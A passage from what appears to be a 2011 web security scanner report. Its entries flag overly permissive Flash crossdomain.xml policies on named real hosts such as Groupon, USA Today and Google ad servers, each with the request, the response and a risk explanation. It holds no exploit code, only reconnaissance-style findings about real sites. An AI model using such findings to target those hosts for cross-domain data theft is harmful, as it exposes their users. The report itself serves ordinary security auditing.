Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: w10.localadbuy.com

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:36:58 GMT
Content-Type: application/xml
Content-Length: 340
Last-Modified: Thu, 09 Dec 2010 18:13:51 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.55. http://widget.newsinc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widget.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: WG7y2gX1/96nanqwYADUuDtOwvrux+J3B/rD+BbX0FP48UXZR/sEjPQFKLyfXNhP
x-amz-request-id: 9337D374BAA52553
Date: Mon, 09 May 2011 15:37:39 GMT
Last-Modified: Mon, 26 Oct 2009 18:54:37 GMT
ETag: "9a2df4412dfbe178fccafc4915ad186e"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 335
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.56. http://wvue.web.entriq.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wvue.web.entriq.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache
X-Host: w3
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 295
Keep-Alive: timeout=3
Connection: Keep-Alive
Content-Type: text/html

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.57. http://www.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:54 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n23), rf-ht iad-agg-n23 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:54 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.58. http://www.groupon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 258768
Date: Mon, 09 May 2011 15:35:34 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.59. https://www.groupon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
Age: 225292
Last-Modified: Thu, 18 Nov 2010 03:10:16 GMT
Content-Length: 352

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xedge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xedge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Length: 268
Content-Type: text/xml
Content-Location: http://xedge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:ddb"
Server: Microsoft-IIS/6.0
X-Server: D2E.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

3.61. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:28 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 418
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...

3.62. http://ads.bridgetrack.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.63. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.64. http://contextweb.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
ETag: "8034251217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:35 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.65. http://data.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
Accept-Ranges: bytes
ETag: "069301417e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1558
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.66. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 01:55:59 GMT
Expires: Tue, 10 May 2011 01:55:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49166
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.67. http://i.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
Accept-Ranges: bytes
ETag: "069301417e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1558
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.68. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:58 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Tue, 12 Apr 2011 23:18:01 GMT
Accept-Ranges: bytes
Content-Length: 223
_eep-Alive: timeout=5, max=5
_onnection: Keep-Alive
Content-Type: application/xml
Via: CN-5000
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.69. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 05:11:30 GMT
Expires: Tue, 10 May 2011 05:11:30 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 37413
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.70. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 04:11:58 GMT
Expires: Tue, 10 May 2011 04:11:58 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 40983
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
